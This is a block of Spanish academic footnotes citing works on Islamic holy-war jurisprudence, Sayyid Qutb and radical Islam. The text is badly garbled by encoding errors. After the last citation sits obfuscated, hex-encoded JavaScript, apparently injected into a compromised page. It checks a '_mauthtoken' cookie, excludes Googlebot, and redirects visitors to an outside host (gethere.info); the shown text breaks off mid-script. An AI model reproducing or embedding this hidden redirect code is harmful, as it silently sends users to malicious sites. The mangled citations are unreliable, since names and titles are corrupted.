[32]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ARCAS CAMPOY, M.: TeorAi??a jurAi??dica de la guerra santa: el KitA?b Qidwat al-GA?zAi?? de Ibn AbAi?? ZamanAi??n, Al-Andalus-Magreb I, 1993, p.59.

[33]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ZAMANA?N, I. A.: QudwA?t al-GA?zAi??, ed. y est. por ai???A. SulaymA?nAi??, Editorial DA?r al-Garb al-IslA?mAi??, Beirut, 1989, p.101-104.

[34]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ZAMANA?N, I. A.: QudwA?t al-GA?zAi??, ed. y est. por ai???A. SulaymA?nAi??, Editorial DA?r al-Garb al-IslA?mAi??, Beirut, 1989, p.104.

[35]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p.105-107.

[36]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 115-118.

[37]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 118-121.

[38]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ZAMANA?N, I. A.: QudwA?t al-GA?zAi??, ed. y est. por ai???A. SulaymA?nAi??, Editorial DA?r al-Garb al-IslA?mAi??, Beirut, 1989, p.121-125.

[39]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p.127-128.

[40]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 139-223.

[41]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? QUTB, S.: Justicia social en el Islam, Trad. de JosAi?? Cepedello Boiso, Editorial Almuzara, 2007, p.7-30.

[42]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? SIVAN, E.: El Islam radical, Ediciones Bellaterra, Barcelona, 2000, p.36-156.

[43]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? https://es.wikipedia.org/wiki/Fuad_I_de_Egipto

Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? https://es.wikipedia.org/wiki/Faruq_de_Egipto

[44]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? www.ecured.cu/Sayyid_Qutb#Obras

[45]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? QUTB, S.: Justicia social en el Islam, Trad. de JosAi?? Cepedello Boiso, Editorial Almuzara, 2007, p. 359-360.

[46]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? QUTB, S.: Las normas en el camino del Islam, Centro IslA?mico, Granada, 1978.

[47]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? QUTB, S.: Mai???A?lim fAi?? l-TarAi??q, Editorial DA?r A?urAi??q, al-QA?hira, 1979, p. 189.

QUTB, S.: Milestones, Editorial Maktabah Booksellers and Publishers, Birminghan, England, 2006, p.63-86.

[48]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? QUTB, S.: Las normas en el camino del Islam, Centro IslA?mico, Granada, 1978, p. 73-108.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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